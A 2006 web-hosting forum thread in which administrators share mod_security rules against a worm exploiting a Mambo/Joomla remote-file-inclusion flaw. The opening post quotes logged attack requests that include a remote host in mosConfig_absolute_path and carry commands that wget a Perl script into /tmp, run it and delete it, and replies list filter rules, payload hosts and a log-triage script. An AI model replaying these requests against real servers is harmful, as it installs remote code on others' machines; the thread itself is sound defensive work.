
need help with mod-security to prevent attacks from specific websites.

Discussion in 'Security' started by neonix, Feb 10, 2006.

  1. neonix

    neonix Well-Known Member

    Joined:
    Oct 21, 2004
    Messages:
    124
    Likes Received:
    2
    Trophy Points:
    0
    Hi,

    Mod-security is blocking a wave of attacks from different IPs trying to download malicious files from www.thriftysix.co.uk, www.freewebs.com and www.sporadical.org.

    Blocking IPs does not work, as the attackers keep on changing IPs, but the websites from where they are trying to download these tools remain the same. How do I blacklist these websites completely? I have a RHEL/cPanel server. Thanks for your help and advice.

    202.133.209.67 2006-02-11 05:48:42 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0 www.xxx.net Access denied with code 406. Pattern match "wget " at THE_REQUEST 406

    220.245.178.132 2006-02-11 05:46:47 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/sess2006/tool.gif?&cmd=cd%20/tmp/;GET%20http://freewebs.com/sess2006/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.0 www.xxxx.net Access denied with code 406. Pattern match "Mozilla/(4|5)\\.0$" at HEADER("USER-AGENT") 406

    202.133.209.67 2006-02-11 05:44:37 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sporadical.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.sporadical.org/xxd.txt;perl%20xxd.txt;rm%20-rf%20xxd.txt*? HTTP/1.0
     
  2. rustelekom

    rustelekom Well-Known Member
    PartnerNOC

    Joined:
    Nov 13, 2003
    Messages:
    290
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    moscow
    It would be better if you just block wget, cd and other system commands.
    BTW - you may just download the newest mod_security rules from the official modsecurity.org site.
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Block the type of attack.

    SecFilter "mosConfig_absolute_path" would even do it.

    Also, check around the forums for posts / threads by me with my rules, this one is in there long ago.

    Unfortunately, since this is a worm and spreads itself using the servers it has infected, you can either ask your data center to drop traffic at the router for each IP, or sit it out, and empty your audit_log, once in a while :)

    But the main thing about this attack that can be squashed, regardless of what command they run (what if it's not wget?), is:

    SecFilter "mosConfig_absolute_path"
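    As an added example (not code from anyone in this thread), the script below does the triage the original poster is doing by hand and shows why HostMerit's parameter-level rule holds up: it reads mod_security 1.x access-denied lines shaped like the ones pasted above, pulls out the host each mosConfig_absolute_path remote-file-inclusion attempt tries to load code from, groups attacking IPs by that host, and emits SecFilter rules for both the parameter and the hosts. The sample lines are shortened copies of the thread's with the local vhost replaced by a placeholder; `www.example.invalid` and `10.0.0.5` are constructed.

```python
# Added example (not from the thread): triage mod_security 1.x access-denied
# lines like the ones the original poster pasted. It pulls out the host each
# Mambo/Joomla mosConfig_absolute_path remote-file-inclusion attempt tries to
# load code from, groups attacking IPs by that host, and emits SecFilter rules.
import re
from collections import defaultdict
from urllib.parse import unquote, urlparse

# Constructed sample: two of the thread's request lines, shortened, with the
# local vhost replaced by a placeholder, plus one benign request (10.0.0.5).
SAMPLE_LOG = """\
202.133.209.67 2006-02-11 05:48:42 /index.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt HTTP/1.0 www.example.invalid Access denied with code 406.
220.245.178.132 2006-02-11 05:46:47 /index.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://www.freewebs.com/sess2006/tool.gif?&cmd=cd%20/tmp/;GET%20http://freewebs.com/sess2006/sess3023_ HTTP/1.0 www.example.invalid Access denied with code 406.
10.0.0.5 2006-02-11 05:50:00 /index.php?option=com_content&Itemid=1 HTTP/1.0 www.example.invalid Access denied with code 406.
"""

# source IP, date, time, request path, protocol; the rest of the line is ignored
LINE_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ (?P<path>\S+) HTTP/\d\.\d")

def query_params(path):
    """Decode the query string, splitting on '&' and '=' only (parse_qs on
    Python < 3.9.2 also splits on ';', which would shred the cmd= payload)."""
    params = {}
    for pair in path.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def rfi_include_host(params):
    """Host a mosConfig_absolute_path RFI points at, or None. No legitimate
    request carries this Mambo/Joomla config variable as a URL at all."""
    value = params.get("mosConfig_absolute_path", "")
    if not value.lower().startswith(("http://", "https://", "ftp://")):
        return None
    return urlparse(value).hostname

def triage(log_text):
    """Map each remote include host to the sorted list of source IPs using it."""
    by_host = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        host = m and rfi_include_host(query_params(m["path"]))
        if host:
            by_host[host].add(m["ip"])
    return {h: sorted(ips) for h, ips in by_host.items()}

def secfilter_rules(hosts):
    """mod_security 1.x rules: the parameter-level filter first (it catches the
    worm even from a host not yet seen), then the per-host blacklist."""
    rules = ['SecFilter "mosConfig_absolute_path=http"']
    return rules + ['SecFilter "%s"' % re.escape(h) for h in sorted(hosts)]
```

    Running `triage(SAMPLE_LOG)` shows one IP per include host in this small sample; on a real audit_log it makes the original poster's point visible, many IPs funnelling through the same handful of hosts.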
     
  4. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    I added my audit_log to logrotate... that helps
     
  5. neonix

    neonix Well-Known Member

    Joined:
    Oct 21, 2004
    Messages:
    124
    Likes Received:
    2
    Trophy Points:
    0
    Kris,

    The reason mod-security has been blocking these attacks is that I have been using your rules :D

    Do you have a 'rule' to blacklist some websites completely... to prevent any scripts being downloaded/run from there, as an added precaution?

    Thanks for your help!

    # Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
    # Mambo/Joomla remote-file-inclusion parameter, plus the tool names and
    # hosts seen in the honeypot payloads
    SecFilter "mosConfig_absolute_path"
    SecFilterSelective THE_REQUEST "tool\.gif"
    SecFilterSelective THE_REQUEST "tool25\.txt"
    SecFilter "perl\x20xx\.txt"
    SecFilter "sweet-serenity\.org"
    SecFilterSelective THE_REQUEST "sess3025"
    SecFilter "mosConfig_absolute_path=http"
    SecFilter "echo\x20YYY"
    SecFilter "cmd\.gif?"
    SecFilter "\x20bash;"
    # download hosts used by the payloads
    SecFilter "200\.72\.130\.29"
    SecFilter "200\.207\.91\.25"
    SecFilter "62\.23\.221\.67"
    SecFilter "147\.142\.142\.24"
    SecFilter "202\.143\.140\.151"
    SecFilterSelective THE_REQUEST "killop"
    SecFilterSelective THE_REQUEST "\/bash;chmod"
     
  6. ShockHosts

    ShockHosts Well-Known Member

    Joined:
    Nov 25, 2005
    Messages:
    123
    Likes Received:
    0
    Trophy Points:
    16
    Just about the link... it is http://modsecurity.org, just in case no one knew...

    Find the attacker's hostname (palmer.comcast.net) and try to block that with iptables or something..
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    It's a rootkit that's spread, so if anything, you'd block the website it's accessing. Since it spreads rapidly there's no way of knowing the possible attacking IPs, but if they only use a pool of 5-6 websites (sporadical.org etc.) it's easy to block them.

    Glad to get some thanks for my security rules :)

    This would even work, but I haven't tried it as it (MIGHT) block some legitimate items.

    SecFilter "cmd=cd"
     
    #7 HostMerit, Feb 15, 2006
    Last edited: Feb 15, 2006